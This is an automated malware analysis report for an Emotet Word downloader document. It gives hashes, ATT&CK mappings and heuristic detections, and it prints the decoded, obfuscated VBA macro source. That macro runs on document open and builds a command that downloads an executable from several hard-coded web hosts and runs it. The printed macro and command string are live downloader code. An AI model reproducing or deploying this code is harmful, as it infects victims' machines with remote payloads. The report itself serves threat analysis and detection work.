Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a5e1272a9bb32f43…

MALICIOUS

Office (OLE)

69.2 KB First seen: 2020-01-07
MD5: bba7ae56e050e2641c98ffc2beeca668 SHA-1: f905d509871802eed4bea69a575f5672f5fe0b79 SHA-256: a5e1272a9bb32f43f761e76ab352a25eb1c3584495c391ad670b1b5448ddcacf
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains critical heuristics for VBA macros and a Shell() call, strongly indicating malicious intent. ClamAV identifies it as 'Doc.Downloader.Emotet-6884067-0'. The VBA script, though obfuscated, contains elements that suggest it attempts to download and execute a second-stage payload, likely leveraging the reconstructed command string 'cmd /V:O /C "set Z5IA= } {kaerb;Amd$^ " ;Amd$^ ,adq$(elifd aoln w oD.FCC ${yr t {)DR F$^ n i adq$(hcaero f;' ex e.'+VVM$+'\' + cilbup:vne$^ =Amd$^;'536' = VV M$^;)^'@'(tilpS.^'hFzgH Jm/yb.xul-arolf.www//:ptth@wkqXjOG/ku.'

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-6884067-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884067-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4418 bytes
SHA-256: 1f754dcb354c1f1e184634abdbd5c59b1d73d6d60126f3331374c2641c22a360
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZIhIpmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If ozvjrE Xor GtljZ Then

wauzF = "OCFSwJ"
End If
   If pmJTl <= 12 Then

ALJWOw = "kNRVZf"
End If
   If pdoLt = shwdrl Then

umfnIY = "DBpGtYXJbwiSEY"
End If
   If Hstwwk >= mChjq Then

irztwI = "YkjSCRR"
End If
jmHtqvtib (KeyString(mVWBG + hwZbkZU + 17 + 19 + 31 + vwIkQY + wdpow) + BJmAnzj + dcXoWj + KeyString(jEdjFZlN + Ddquka + 20 + 21 + 36 + bnUwULi + oAvlO) + wmwaJ + morOjcjH + bOfhVCUKH + fkwzPzSQ + qwnOItzK)
   If hRVPjG <= wZjJh Then

mIXczn = "Wp"
End If
End Sub


Attribute VB_Name = "jMohWYEOYPKN"
Function wmwaJ()
If YXKTOi <= VsFua Then

pNYloM = "fTbIlX"
End If
   If lIODrc <= iGzwwr Then

amffN = "BGpnuFFjcjduo"
End If
RLluMEkdW = "d /V^:^O/C" + """" + "^s^e^t Z^5^I^A=^ " + "^ ^ ^ ^ ^ ^  ^ ^" + " ^ ^ ^  ^ ^ ^ ^}^" + "}^{hc^tac^}^;^k^a^e" + "r^b^;^A^m^d^$^ ^"
If TDIhR And PULzQ Then

lzhziH = "PLsGbiGEvBhra"
End If
RhwDw = "m^e^t^I^-^" + "e^k^ovn^I^;" + ")^A^m^d^$^ ^,^a^d^" + "q$(^e^li^F^d^ao^ln^"
If fzLiB > 12 Then

baQNnw = "Eq"
End If
   If zhCLzU > 13 Then

dIqwm = "jNlbGQI"
End If
   If Bmtjn = 7 Then

DZpwhu = "uJGQKm"
End If
QjOEVlZOJ = "w^o^D^.^FCC^$^{^yr^" + "t^{)DR^F^$^ n^i^ ^a^" + "d^q^$(hc^a^er^" + "o^f^;^'^e^xe^.^'^+V"
NCBWTpJz = "V^M^$^+^'^\^'" + "+c^il^b^u^p^:vn^e^$^" + "=^A^m^d^$^;'" + "^5^36^'^ ^=^ VV^" + "M^$^;)^'^@^'(^t^i^l^" + "pS^.^'^h^F^z^g^H"
If kwjFiI <= NvVpDV Then

JfCFz = "Sa"
End If
wtwiFzXM = "^J^m/^y^b^.^x^u^" + "l^-^ar^o^l^" + "f^.w^w^w//^:p^t^t^h^" + "@^w^k^q^X^jO^G/k" + "^u^.^oc^.c^"
UlzhYbfWU = "p^4^xi^f^.^w^w^w" + "//:^p^tt^h^@^Pw1r" + "^t^8/r^b^.^m" + "^oc^.^s^a^o^g^al^et" + "e^sr^a^s^s"
wmwaJ = RLluMEkdW + RhwDw + QjOEVlZOJ + NCBWTpJz + wtwiFzXM + UlzhYbfWU
   If sOoDH <> kobPc Then

sQuPBK = "CZIGAdYuY"
End If
   If knYBlV >= LJtzjw Then

Vlmaj = "jinvdrwdfiw"
End If
   If izDTFv >= ifRwzI Then

LKkaC = "dT"
End If
   If kzbbJ <= 16 Then

GQmYVk = "ODlnwFl"
End If
End Function
Function morOjcjH()
If oTVkC Or 14 Then

jLfWn = "HwBlJNijcLQDj"
End If
   If jHnaiP <= pukih Then

KzhTf = "EZAs"
End If
GPLWG = "^er^p^x^e^.w^w^w" + "//^:p^t^t^h@3O^T^" + "54^ec/^s^e^."
If sWdXR Or YvACFu Then

VEiHR = "sswFqUzv"
End If
   If nOiPw And uwrFs Then

wVtnL = "LiMTQnNIpdD"
End If
kCljiPYmQi = "^er^e^k^e^t^.^w" + "^w^w//^:^p^t^t^h@" + "^E^p^g^6^I/^" + "m^oc^.^p^u^i"
If zmYjv > dsPiFS Then

pElivI = "Pnc"
End If
   If ZLuRmC Or sXFjk Then

VCVCM = "o"
End If
   If DKwHNa Xor zTMIs Then

GiOfp = "f"
End If
   If NRQiM Eqv UqMKco Then

ahlCIh = "fdwt"
End If
   If RtZBz > Vwczm Then

LjHYMS = "ai"
End If
AMEHQYXnFZ = "^gn^a^ba^u^m.^w^w" + "^w//^:^p^t^" + "t^h^'^=^DR^F^$^" + ";^tn^e^i^lC^b"
morOjcjH = GPLWG + kCljiPYmQi + AMEHQYXnFZ
   If POIht > 16 Then

szZpjU = "zXFbFOj"
End If
   If tkzbQ Eqv 18 Then

izfqj = "rddz"
End If
End Function
Function bOfhVCUKH()
IjQDz = "^e^W^.^t^eN^ ^t" + "c^e^j^b^o^-^w^en^=" + "^FCC^$ ^l^l^e" + "^h^sr^ew^o^p&&^f^" + "or /^L %^s " + "^in (^3^7^9^,^-^1"
If UwHhnG > skwoO Then

EzsMR = "ra"
End If
   If sNKTjq Xor 14 Then

CYkODb = "i"
End If
   If Episk >= oXmhrp Then

MuFGoa = "uznIjOKPmOnYku"
End If
   If dBuTu < 9 Then

rCdwiP = "RMqKj"
End If
wPFDGOqvr = "^,^0)^d^o ^s^e" + "^t ^U^2^y=" + "!^U^2^y!!Z^5" + "^I^A:~%^s,1!&&^i^f" + " %^s=^=^0 c^a^l^l %^" + "U^2^y:^~^-^3^8"
EHTkqQON = "^0%" + """" + ""
bOfhVCUKH = IjQDz + wPFDGOqvr + EHTkqQON
   If mvpnA <> CXoco Then

KZWQQ = "wr"
End If
   If PYkYt And EpJBv Then

DICVwF = "QzizZEl"
End If
   If KwkwWk = LTHuED Then

MHsnG = "hTR"
End If
   If NlSwZ Xor hXPPf Then

MJCAk = "GCV"
End If
End Function


Attribute VB_Name = "jQJwTrFjI"
Function jmHtqvtib(RAfflt As String)
Const cshrXuVAjC = 264242985 - 264242985
   If lRCWj >= sKniW Then

ScAcu = "Tb
... (truncated)